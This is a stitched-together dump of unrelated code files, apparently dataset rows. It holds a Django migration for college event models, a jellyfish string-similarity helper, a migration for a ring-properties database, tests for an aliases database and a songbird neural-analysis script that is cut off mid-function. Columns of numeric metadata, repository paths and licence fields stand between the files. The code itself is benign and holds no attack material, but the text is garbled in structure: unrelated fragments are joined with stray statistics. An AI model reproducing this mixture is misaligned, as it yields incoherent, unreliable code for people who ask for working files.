            name='event_id',
            field=models.CharField(default='CIV01', max_length=5),
        ),
        migrations.AlterField(
            model_name='guessthebond',
            name='event_name',
            field=models.CharField(default='GUESS THE BOND?', max_length=30),
        ),
        migrations.AlterField(
            model_name='guessthebond',
            name='member_1',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='guessthebond',
            name='member_2',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='industrialcasestudy',
            name='event_id',
            field=models.CharField(default='CH01', max_length=5),
        ),
        migrations.AlterField(
            model_name='industrialcasestudy',
            name='event_name',
            field=models.CharField(default='INDUSTRIAL CASE STUDY', max_length=30),
        ),
        migrations.AlterField(
            model_name='industrialcasestudy',
            name='member_1',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='industrialcasestudy',
            name='member_2',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='justaminute',
            name='event_id',
            field=models.CharField(default='BT01', max_length=5),
        ),
        migrations.AlterField(
            model_name='justaminute',
            name='event_name',
            field=models.CharField(default='JUST A MINUTE', max_length=20),
        ),
        migrations.AlterField(
            model_name='karyaniti',
            name='event_id',
            field=models.CharField(default='MBA01', max_length=5),
        ),
        migrations.AlterField(
            model_name='karyaniti',
            name='event_name',
            field=models.CharField(default='KARYANITI', max_length=20),
        ),
        migrations.AlterField(
            model_name='karyaniti',
            name='member_1',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='karyaniti',
            name='member_2',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='karyaniti',
            name='member_3',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='karyaniti',
            name='member_4',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='mindfizz',
            name='event_id',
            field=models.CharField(default='ECE01', max_length=5),
        ),
        migrations.AlterField(
            model_name='mindfizz',
            name='event_name',
            field=models.CharField(default='MIND FIZZ', max_length=20),
        ),
        migrations.AlterField(
            model_name='mindfizz',
            name='member_1',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='mindfizz',
            name='member_2',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='mindfizz',
            name='member_3',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='mindfizz',
            name='member_4',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='posterandpresentation',
            name='event_id',
            field=models.CharField(default='MCA02', max_length=5),
        ),
        migrations.AlterField(
            model_name='posterandpresentation',
            name='event_name',
            field=models.CharField(default='POSTER & PRESENTATIONS', max_length=40),
        ),
        migrations.AlterField(
            model_name='postermaking',
            name='event_id',
            field=models.CharField(default='Bph01', max_length=5),
        ),
        migrations.AlterField(
            model_name='postermaking',
            name='event_name',
            field=models.CharField(default='POSTER MAKING', max_length=20),
        ),
        migrations.AlterField(
            model_name='postermaking',
            name='member_1',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='postermaking',
            name='member_2',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='roborace',
            name='event_id',
            field=models.CharField(default='EN01', max_length=5),
        ),
        migrations.AlterField(
            model_name='roborace',
            name='event_name',
            field=models.CharField(default='ROBO RACE', max_length=20),
        ),
        migrations.AlterField(
            model_name='roborace',
            name='member_1',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='roborace',
            name='member_2',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='roborace',
            name='member_3',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='roborace',
            name='member_4',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='robosoccer',
            name='event_id',
            field=models.CharField(default='ME02', max_length=5),
        ),
        migrations.AlterField(
            model_name='robosoccer',
            name='event_name',
            field=models.CharField(default='ROBO SOCCER', max_length=20),
        ),
        migrations.AlterField(
            model_name='robosoccer',
            name='member_1',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='robosoccer',
            name='member_2',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='robosoccer',
            name='member_3',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='robosoccer',
            name='member_4',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='robosoccer',
            name='number_of_members',
            field=models.CharField(default='', max_length=10),
        ),
        migrations.AlterField(
            model_name='startupmaster',
            name='event_id',
            field=models.CharField(default='EN02', max_length=5),
        ),
        migrations.AlterField(
            model_name='startupmaster',
            name='event_name',
            field=models.CharField(default='START UP MASTER', max_length=30),
        ),
        migrations.AlterField(
            model_name='startupmaster',
            name='member_1',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='startupmaster',
            name='member_2',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='technicalquiz',
            name='event_id',
            field=models.CharField(default='MCA01', max_length=5),
        ),
        migrations.AlterField(
            model_name='technicalquiz',
            name='event_name',
            field=models.CharField(default='TECHNICAL QUIZ', max_length=20),
        ),
        migrations.AlterField(
            model_name='technicalquiz',
            name='member_1',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='technicalquiz',
            name='member_2',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='webdesigning',
            name='event_id',
            field=models.CharField(default='IT01', max_length=5),
        ),
        migrations.AlterField(
            model_name='webdesigning',
            name='event_name',
            field=models.CharField(default='WEB DESIGNING', max_length=20),
        ),
        migrations.AlterField(
            model_name='webdesigning',
            name='member_1',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='webdesigning',
            name='member_2',
            field=models.CharField(blank=True, default='', max_length=20),
        ),
    ]
| 35.02346
| 84
| 0.551453
| 1,085
| 11,943
| 5.886636
| 0.095853
| 0.094411
| 0.230938
| 0.267888
| 0.934085
| 0.934085
| 0.914357
| 0.572256
| 0.52873
| 0.509786
| 0
| 0.024417
| 0.324458
| 11,943
| 340
| 85
| 35.126471
| 0.767229
| 0.003768
| 0
| 0.892216
| 1
| 0
| 0.137777
| 0.01076
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.002994
| 0
| 0.011976
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d47a714f450edb22c36e1f1df48a093a8a8b87c8
| 134
|
py
|
Python
|
src/match/match.py
|
ispmarin/text_norm
|
d080983a842dd303da59bfc19dd13aa43abe2961
|
[
"MIT"
] | 2
|
2019-01-29T07:49:05.000Z
|
2021-12-22T06:19:08.000Z
|
src/match/match.py
|
ispmarin/text_norm
|
d080983a842dd303da59bfc19dd13aa43abe2961
|
[
"MIT"
] | null | null | null |
src/match/match.py
|
ispmarin/text_norm
|
d080983a842dd303da59bfc19dd13aa43abe2961
|
[
"MIT"
] | 1
|
2022-02-07T14:36:06.000Z
|
2022-02-07T14:36:06.000Z
|
import jellyfish
def similarity(input_string_1, input_string_2):
    """Return the Jaro-Winkler similarity of the two input strings.

    Thin wrapper around ``jellyfish.jaro_winkler``.
    NOTE(review): newer jellyfish releases renamed this function to
    ``jaro_winkler_similarity`` -- confirm the pinned jellyfish version.
    """
    score = jellyfish.jaro_winkler(input_string_1, input_string_2)
    return score
| 19.142857
| 65
| 0.828358
| 20
| 134
| 5.1
| 0.55
| 0.431373
| 0.235294
| 0.333333
| 0.470588
| 0.470588
| 0
| 0
| 0
| 0
| 0
| 0.033613
| 0.11194
| 134
| 6
| 66
| 22.333333
| 0.823529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
2e45cde18680c0403b46cc4fef659ac9a3c1ab89
| 10,342
|
py
|
Python
|
ringapp/migrations/0001_initial.py
|
rschwiebert/RingApp
|
35675b3dd81728d71b7dc70071be3185d7f99bf4
|
[
"MIT"
] | 10
|
2015-02-02T12:40:05.000Z
|
2022-01-29T14:11:03.000Z
|
ringapp/migrations/0001_initial.py
|
rschwiebert/RingApp
|
35675b3dd81728d71b7dc70071be3185d7f99bf4
|
[
"MIT"
] | 22
|
2015-01-07T21:29:24.000Z
|
2022-03-19T01:15:13.000Z
|
ringapp/migrations/0001_initial.py
|
rschwiebert/RingApp
|
35675b3dd81728d71b7dc70071be3185d7f99bf4
|
[
"MIT"
] | 1
|
2016-08-07T15:41:51.000Z
|
2016-08-07T15:41:51.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Initial schema for the ring/property database.

    Creates a set of tables for rings and their properties
    (``Ring``/``Property``/``RingProperty``/``Logic``/``Equivalents``),
    a parallel ``Comm*``-prefixed set (presumably for the commutative
    case -- inferred from the prefix only), and reference tables
    ``Citation``/``Publication``/``Theorem``.  Several ForeignKeys are
    attached afterwards via AddField operations.
    """
    # First migration: nothing to depend on.
    dependencies = [
    ]
    operations = [
        # Literature citation; its FK to Publication is added below.
        migrations.CreateModel(
            name='Citation',
            fields=[
                ('id', models.AutoField(unique=True, serialize=False, primary_key=True)),
                ('location', models.CharField(max_length=50)),
                ('poster', models.CharField(max_length=30)),
                ('time', models.DateTimeField(auto_now_add=True)),
            ],
            options={
                'db_table': 'citations',
            },
            bases=(models.Model,),
        ),
        # Commutative-side equivalents; FK to CommProperty added below.
        migrations.CreateModel(
            name='CommEquivalents',
            fields=[
                ('id', models.AutoField(unique=True, serialize=False, primary_key=True)),
                ('equivalent', models.CharField(max_length=500)),
                ('keywords', models.CharField(max_length=200)),
                ('source', models.CharField(max_length=100)),
                ('poster', models.CharField(max_length=30, null=True, blank=True)),
            ],
            options={
                'db_table': 'comm_equivalents',
            },
            bases=(models.Model,),
        ),
        # Logic entries (conditions cond_1..cond_4 -> conclusion) for the
        # commutative side.
        migrations.CreateModel(
            name='CommLogic',
            fields=[
                ('logic_id', models.AutoField(unique=True, serialize=False, primary_key=True, db_column='logic_ID')),
                ('entry_type', models.IntegerField(null=True, blank=True)),
                ('cond_1', models.IntegerField(null=True, blank=True)),
                ('cond_2', models.IntegerField(null=True, blank=True)),
                ('cond_3', models.IntegerField(null=True, blank=True)),
                ('cond_4', models.IntegerField(null=True, blank=True)),
                ('conc', models.IntegerField(null=True, blank=True)),
                ('option', models.CharField(max_length=200, blank=True)),
                # NOTE(review): unlike Logic.citation below, this column is
                # NOT nullable -- confirm whether the asymmetry is intended.
                ('citation', models.CharField(max_length=200, blank=True)),
                ('poster', models.CharField(max_length=25, null=True, blank=True)),
                ('readable', models.CharField(max_length=120, null=True, blank=True)),
            ],
            options={
                'db_table': 'comm_logic',
            },
            bases=(models.Model,),
        ),
        # Named property definitions, commutative side.
        migrations.CreateModel(
            name='CommProperty',
            fields=[
                ('property_id', models.AutoField(unique=True, serialize=False, primary_key=True, db_column='property_ID')),
                ('name', models.CharField(max_length=250)),
                ('definition', models.CharField(max_length=500)),
                ('poster', models.CharField(max_length=25, null=True, blank=True)),
            ],
            options={
                'db_table': 'comm_properties',
            },
            bases=(models.Model,),
        ),
        # Join table: which ring has which commutative property; the FK
        # to Ring is added below via AddField.
        migrations.CreateModel(
            name='CommRingProperty',
            fields=[
                ('id', models.AutoField(unique=True, serialize=False, primary_key=True)),
                ('has_property', models.IntegerField(null=True, blank=True)),
                ('reason', models.CharField(max_length=200)),
                ('source', models.CharField(max_length=500)),
                ('poster', models.CharField(max_length=25, null=True, blank=True)),
                ('time', models.DateTimeField(auto_now_add=True)),
                ('property', models.ForeignKey(db_column='property_ID', blank=True, to='ringapp.CommProperty', null=True, on_delete=models.CASCADE)),
            ],
            options={
                'db_table': 'comm_ring_property',
            },
            bases=(models.Model,),
        ),
        # Equivalents for the general (non-Comm) side; FK to Property
        # added below.
        migrations.CreateModel(
            name='Equivalents',
            fields=[
                ('id', models.AutoField(unique=True, serialize=False, primary_key=True)),
                ('equivalent', models.CharField(max_length=500)),
                ('keywords', models.CharField(max_length=200)),
                ('source', models.CharField(max_length=100)),
                ('poster', models.CharField(max_length=30, null=True, blank=True)),
            ],
            options={
                'db_table': 'equivalents',
            },
            bases=(models.Model,),
        ),
        # Logic entries for the general side (citation IS nullable here).
        migrations.CreateModel(
            name='Logic',
            fields=[
                ('logic_id', models.AutoField(unique=True, serialize=False, primary_key=True, db_column='logic_ID')),
                ('entry_type', models.IntegerField(null=True, blank=True)),
                ('cond_1', models.IntegerField(null=True, blank=True)),
                ('cond_2', models.IntegerField(null=True, blank=True)),
                ('cond_3', models.IntegerField(null=True, blank=True)),
                ('cond_4', models.IntegerField(null=True, blank=True)),
                ('conc', models.IntegerField(null=True, blank=True)),
                ('option', models.CharField(max_length=200, blank=True)),
                ('citation', models.CharField(max_length=200, null=True, blank=True)),
                ('poster', models.CharField(max_length=25, null=True, blank=True)),
                ('readable', models.CharField(max_length=120, null=True, blank=True)),
            ],
            options={
                'db_table': 'logic',
            },
            bases=(models.Model,),
        ),
        # Named property definitions, general side.
        migrations.CreateModel(
            name='Property',
            fields=[
                ('property_id', models.AutoField(unique=True, serialize=False, primary_key=True, db_column='property_ID')),
                ('name', models.CharField(max_length=250)),
                ('definition', models.CharField(max_length=500)),
                ('poster', models.CharField(max_length=25, null=True, blank=True)),
            ],
            options={
                'db_table': 'properties',
            },
            bases=(models.Model,),
        ),
        # Bibliographic source referenced by Citation rows.
        migrations.CreateModel(
            name='Publication',
            fields=[
                ('id', models.AutoField(unique=True, serialize=False, primary_key=True)),
                ('title', models.CharField(max_length=100)),
                ('authors', models.CharField(max_length=50)),
                ('details', models.CharField(max_length=100, null=True, blank=True)),
                ('pub_date', models.DateField()),
                ('poster', models.CharField(max_length=30)),
                ('time', models.DateTimeField(auto_now_add=True)),
            ],
            options={
                'db_table': 'publications',
            },
            bases=(models.Model,),
        ),
        # The rings themselves.
        migrations.CreateModel(
            name='Ring',
            fields=[
                ('ring_id', models.AutoField(unique=True, serialize=False, primary_key=True, db_column='ring_ID')),
                ('name', models.CharField(max_length=250)),
                ('description', models.CharField(max_length=1000)),
                ('keywords', models.CharField(max_length=200)),
                ('reference', models.CharField(max_length=500)),
                ('notes', models.CharField(max_length=500, null=True, blank=True)),
                ('poster', models.CharField(max_length=25, null=True, blank=True)),
            ],
            options={
                'db_table': 'rings',
            },
            bases=(models.Model,),
        ),
        # Join table: which ring has which property (general side).
        # Note: unlike CommRingProperty.time, time is nullable here.
        migrations.CreateModel(
            name='RingProperty',
            fields=[
                ('id', models.AutoField(unique=True, serialize=False, primary_key=True)),
                ('has_property', models.IntegerField(null=True, blank=True)),
                ('reason', models.CharField(max_length=200)),
                ('source', models.CharField(max_length=500)),
                ('poster', models.CharField(max_length=25, null=True, blank=True)),
                ('time', models.DateTimeField(auto_now_add=True, null=True)),
                ('property', models.ForeignKey(db_column='property_ID', blank=True, to='ringapp.Property', null=True, on_delete=models.CASCADE)),
                ('ring', models.ForeignKey(db_column='ring_ID', blank=True, to='ringapp.Ring', null=True, on_delete=models.CASCADE)),
            ],
            options={
                'db_table': 'ring_property',
            },
            bases=(models.Model,),
        ),
        # Theorems with many-to-many citation references.
        # NOTE(review): db_column here is lowercase 'theorem_id', unlike
        # the '*_ID' convention used by the other tables.
        migrations.CreateModel(
            name='Theorem',
            fields=[
                ('theorem_id', models.AutoField(unique=True, serialize=False, primary_key=True, db_column='theorem_id')),
                ('alias', models.CharField(max_length=100, null=True, blank=True)),
                ('statement', models.CharField(max_length=400)),
                ('link', models.URLField(null=True, blank=True)),
                ('poster', models.CharField(max_length=25, null=True, blank=True)),
                ('time', models.DateTimeField(auto_now_add=True)),
                ('reference', models.ManyToManyField(to='ringapp.Citation', verbose_name='theorem reference')),
            ],
            options={
                'db_table': 'theorems',
            },
            bases=(models.Model,),
        ),
        # Deferred ForeignKeys (added after all models exist).
        migrations.AddField(
            model_name='equivalents',
            name='property',
            field=models.ForeignKey(db_column='property_ID', blank=True, to='ringapp.Property', null=True, on_delete=models.CASCADE),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='commringproperty',
            name='ring',
            field=models.ForeignKey(db_column='ring_ID', blank=True, to='ringapp.Ring', null=True, on_delete=models.CASCADE),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='commequivalents',
            name='property',
            field=models.ForeignKey(db_column='property_ID', blank=True, to='ringapp.CommProperty', null=True, on_delete=models.CASCADE),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='citation',
            name='publication',
            field=models.ForeignKey(to='ringapp.Publication', on_delete=models.CASCADE),
            preserve_default=True,
        ),
    ]
| 45.761062
| 149
| 0.540901
| 974
| 10,342
| 5.592402
| 0.117043
| 0.118414
| 0.142097
| 0.189462
| 0.86029
| 0.834955
| 0.805948
| 0.737837
| 0.716174
| 0.694878
| 0
| 0.017603
| 0.313382
| 10,342
| 225
| 150
| 45.964444
| 0.749472
| 0.002031
| 0
| 0.666667
| 0
| 0
| 0.117259
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009132
| 0
| 0.022831
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cf81306c1b10890f5af6b1a82b7dc47dbe3a709c
| 258
|
py
|
Python
|
python/testData/inspections/PyAugmentAssignmentInspection/numeric.py
|
Tasemo/intellij-community
|
50aeaf729b7073e91c7c77487a1f155e0dfe3fcd
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/inspections/PyAugmentAssignmentInspection/numeric.py
|
Tasemo/intellij-community
|
50aeaf729b7073e91c7c77487a1f155e0dfe3fcd
|
[
"Apache-2.0"
] | null | null | null |
python/testData/inspections/PyAugmentAssignmentInspection/numeric.py
|
Tasemo/intellij-community
|
50aeaf729b7073e91c7c77487a1f155e0dfe3fcd
|
[
"Apache-2.0"
] | null | null | null |
var_3 = var_3
var_4 = 1
<weak_warning descr="Assignment can be replaced with an augmented assignment">var_6 = var_6 + var_4</weak_warning>
#PY-2482
<weak_warning descr="Assignment can be replaced with an augmented assignment">var = 2 + var</weak_warning>
| 28.666667
| 114
| 0.767442
| 44
| 258
| 4.272727
| 0.409091
| 0.234043
| 0.074468
| 0.276596
| 0.712766
| 0.712766
| 0.712766
| 0.712766
| 0.712766
| 0.712766
| 0
| 0.054054
| 0.139535
| 258
| 8
| 115
| 32.25
| 0.792793
| 0.027132
| 0
| 0
| 0
| 0
| 0.443548
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d8ac1c9254b67c67a915b84c21919691ace2aa42
| 4,132
|
py
|
Python
|
tests/test_alias.py
|
gnutix/taxi
|
3abad480bbc07a0ac1c47c16ee0989227234505b
|
[
"WTFPL"
] | 17
|
2016-02-02T14:10:49.000Z
|
2021-11-30T00:04:29.000Z
|
tests/test_alias.py
|
gnutix/taxi
|
3abad480bbc07a0ac1c47c16ee0989227234505b
|
[
"WTFPL"
] | 70
|
2015-01-08T17:02:42.000Z
|
2021-09-21T20:08:07.000Z
|
tests/test_alias.py
|
gnutix/taxi
|
3abad480bbc07a0ac1c47c16ee0989227234505b
|
[
"WTFPL"
] | 8
|
2015-08-23T12:50:36.000Z
|
2021-11-26T10:33:45.000Z
|
from taxi.aliases import AliasesDatabase, Mapping
def test_alias_in():
    """A stored alias is reported as contained in the database."""
    database = AliasesDatabase({'foo': Mapping(mapping=(1, 2), backend='test')})
    assert 'foo' in database
def test_alias_not_in():
    """An alias that was never stored is not contained in the database."""
    database = AliasesDatabase({'foo': Mapping(mapping=(1, 2), backend='test')})
    assert 'bar' not in database
def test_alias_iter():
    """Iterating the database yields every alias name."""
    database = AliasesDatabase({
        'foo': Mapping(mapping=(1, 2), backend='test'),
        'bar': Mapping(mapping=(1, 3), backend='test'),
    })
    assert set(database) == {'foo', 'bar'}
def test_alias_update_item():
    """Assigning to an existing alias replaces its mapping."""
    database = AliasesDatabase({'foo': Mapping(mapping=(1, 2), backend='test')})
    replacement = Mapping(mapping=(2, 2), backend='test')
    database['foo'] = replacement
    assert database['foo'].mapping == (2, 2)
def test_alias_add_item():
    """Assigning a new alias adds it without disturbing existing entries."""
    database = AliasesDatabase({'foo': Mapping(mapping=(1, 2), backend='test')})
    database['bar'] = Mapping(mapping=(2, 2), backend='test')
    assert database['foo'].mapping == (1, 2)
    assert database['bar'].mapping == (2, 2)
def test_alias_iteritems():
    """iteritems() yields an (alias, mapping) pair for every entry."""
    database = AliasesDatabase({
        'foo': Mapping(mapping=(1, 2), backend='test'),
        'bar': Mapping(mapping=(1, 3), backend='test'),
    })
    expected = {
        ('foo', Mapping(mapping=(1, 2), backend='test')),
        ('bar', Mapping(mapping=(1, 3), backend='test')),
    }
    assert set(database.iteritems()) == expected
def test_keys():
    """keys() lists every stored alias name."""
    database = AliasesDatabase({
        'foo': Mapping(mapping=(1, 2), backend='test'),
        'bar': Mapping(mapping=(1, 3), backend='test'),
    })
    assert set(database.keys()) == {'foo', 'bar'}
def test_update():
    """update() overwrites existing aliases and adds new ones, keeping the rest."""
    database = AliasesDatabase({
        'foo': Mapping(mapping=(1, 2), backend='test'),
        'bar': Mapping(mapping=(1, 3), backend='test'),
    })
    database.update({
        'foo': Mapping(mapping=(2, 2), backend='test'),
        'baz': Mapping(mapping=(9, 9), backend='test'),
    })
    expected = {
        ('foo', Mapping(mapping=(2, 2), backend='test')),
        ('bar', Mapping(mapping=(1, 3), backend='test')),
        ('baz', Mapping(mapping=(9, 9), backend='test')),
    }
    assert set(database.iteritems()) == expected
def test_reset():
    """reset() empties the database."""
    database = AliasesDatabase({'foo': Mapping(mapping=(1, 2), backend='test')})
    database.reset()
    assert 'foo' not in database
def test_get_reversed_aliases():
    """get_reversed_aliases() maps each mapping back to its alias name."""
    database = AliasesDatabase({
        'foo': Mapping(mapping=(1, 2), backend='test'),
        'bar': Mapping(mapping=(1, 3), backend='test'),
    })
    expected = {
        (Mapping(mapping=(1, 2), backend='test'), 'foo'),
        (Mapping(mapping=(1, 3), backend='test'), 'bar'),
    }
    assert set(database.get_reversed_aliases().items()) == expected
def test_filter_from_mapping_partial():
    """A search tuple with None in the second slot matches on the first element only."""
    database = AliasesDatabase({
        'foo': Mapping(mapping=(1, 2), backend='test'),
        'bar': Mapping(mapping=(1, 3), backend='test'),
        'baz': Mapping(mapping=(2, 3), backend='test'),
    })
    matches = database.filter_from_mapping((1, None))
    assert matches == {
        'foo': Mapping(mapping=(1, 2), backend='test'),
        'bar': Mapping(mapping=(1, 3), backend='test'),
    }
def test_filter_from_mapping():
    """A fully specified search tuple matches only the exact mapping."""
    database = AliasesDatabase({
        'foo': Mapping(mapping=(1, 2), backend='test'),
        'bar': Mapping(mapping=(1, 3), backend='test'),
        'baz': Mapping(mapping=(2, 3), backend='test'),
    })
    matches = database.filter_from_mapping((1, 3))
    assert matches == {
        'bar': Mapping(mapping=(1, 3), backend='test')
    }
def test_filter_from_mapping_empty_search():
    """Filtering with None returns every alias unchanged."""
    entries = {
        'foo': Mapping(mapping=(1, 2), backend='test'),
        'bar': Mapping(mapping=(1, 3), backend='test'),
        'baz': Mapping(mapping=(2, 3), backend='test'),
    }
    database = AliasesDatabase(entries)
    assert database.filter_from_mapping(None) == entries
def test_filter_from_alias():
    """Filtering on 'foo' returns both 'foo' and 'foobar' but not 'baz'."""
    entries = {
        'foo': Mapping(mapping=(1, 2), backend='test'),
        'foobar': Mapping(mapping=(1, 3), backend='test'),
        'baz': Mapping(mapping=(2, 3), backend='test'),
    }
    database = AliasesDatabase(entries)
    matches = database.filter_from_alias('foo')
    assert matches == {
        'foo': Mapping(mapping=(1, 2), backend='test'),
        'foobar': Mapping(mapping=(1, 3), backend='test'),
    }
| 28.895105
| 74
| 0.573814
| 511
| 4,132
| 4.53816
| 0.074364
| 0.259595
| 0.213454
| 0.139715
| 0.857266
| 0.786115
| 0.747736
| 0.730487
| 0.72445
| 0.701164
| 0
| 0.029276
| 0.214666
| 4,132
| 142
| 75
| 29.098592
| 0.685362
| 0
| 0
| 0.52381
| 0
| 0
| 0.082285
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 1
| 0.133333
| false
| 0
| 0.009524
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2b01552170c4815514c2a75e9ab3b7ce27672325
| 13,600
|
py
|
Python
|
src/analysis/bout_amplitude_analysis.py
|
Darilbii/Songbird_LFP_Paper
|
20131134353ffc4702eed490fcc3fefec9b08e32
|
[
"MIT"
] | null | null | null |
src/analysis/bout_amplitude_analysis.py
|
Darilbii/Songbird_LFP_Paper
|
20131134353ffc4702eed490fcc3fefec9b08e32
|
[
"MIT"
] | null | null | null |
src/analysis/bout_amplitude_analysis.py
|
Darilbii/Songbird_LFP_Paper
|
20131134353ffc4702eed490fcc3fefec9b08e32
|
[
"MIT"
] | null | null | null |
import numpy as np
import BirdSongToolbox.free_epoch_tools as fet
from BirdSongToolbox.import_data import ImportData
from BirdSongToolbox.file_utility_functions import _save_numpy_data, _load_numpy_data
import src.analysis.hilbert_based_pipeline as hbp
# from src.analysis.chunk_when_analysis_naive import save_pandas_to_pickle
from src.analysis.context_utility import birds_context_obj, all_last_syllable
from src.analysis.ml_pipeline_utilities import all_bad_channels
from BirdSongToolbox.context_hand_labeling import label_focus_context, first_context_func, last_context_func
bout_amplitude_analysis_path = '/home/debrown/bout_amplitude_analysis'
def get_bout_amplitude_analysis_results(bird_id='z007', session='day-2016-09-09'):
    """Load the four saved bout-amplitude arrays for one bird/session.

    Returns (before_low, before_high, after_high, after_low), i.e. the
    arrays written by run_bout_amplitude_analysis, read back from
    bout_amplitude_analysis_path.  (The original "Save the ..." comments
    were copy-paste leftovers -- these calls load.)
    """
    def _load(name):
        # One saved array, keyed by bird/session under the analysis path.
        return _load_numpy_data(data_name=name, bird_id=bird_id, session=session,
                                source=bout_amplitude_analysis_path, verbose=True)
    bout_amplitude_analysis_before_low = _load("bout_amplitude_analysis_before_low")
    bout_amplitude_analysis_before_high = _load("bout_amplitude_analysis_before_high")
    bout_amplitude_analysis_after_high = _load("bout_amplitude_analysis_after_high")
    bout_amplitude_analysis_after_low = _load("bout_amplitude_analysis_after_low")
    return (bout_amplitude_analysis_before_low, bout_amplitude_analysis_before_high,
            bout_amplitude_analysis_after_high, bout_amplitude_analysis_after_low)
def run_bout_amplitude_analysis(bird_id='z007', session='day-2016-09-09'):
    """Compute and save amplitude-change features around bout starts/ends.

    Pipeline: z-scored Hilbert amplitude over 100 log-spaced frequency
    bins (mv_avg=100 smoothing) is clipped in a (-100, 200) window around
    each bout-first and bout-last syllable; the per-trial change is the
    sample at index 100 minus the sample at index 200 of that window.
    Bad channels are removed, the frequency axis is split at bin 65
    (the file's "50 Hz" boundary), and each half is reshaped to
    (instances, features) and saved with _save_numpy_data under
    bout_amplitude_analysis_path.

    :param bird_id: subject identifier (keys into all_bad_channels etc.)
    :param session: recording session ('day-...') to process
    """
    zdata = ImportData(bird_id=bird_id, session=session)
    # Format handlabels for use
    chunk_labels_list, chunk_onsets_list = fet.get_chunk_handlabels(handlabels_list=zdata.song_handlabels)
    # Switch to the log-spaced frequency bins
    freq_bins = 100
    fc_lo = np.logspace(np.log10(2), np.log10(220), freq_bins)
    fc_hi = np.logspace(np.log10(3), np.log10(250), freq_bins)
    # Get channels to exclude from the common-average reference (CAR)
    bad_channels = all_bad_channels[bird_id]
    proc_data2 = hbp.feature_extraction_chunk(neural_chunks=zdata.song_neural,
                                              fs=1000,
                                              l_freqs=fc_lo,
                                              h_freqs=fc_hi,
                                              hilbert="amplitude",
                                              z_score=True,
                                              mv_avg=100,
                                              bad_channels=bad_channels,
                                              verbose=True)
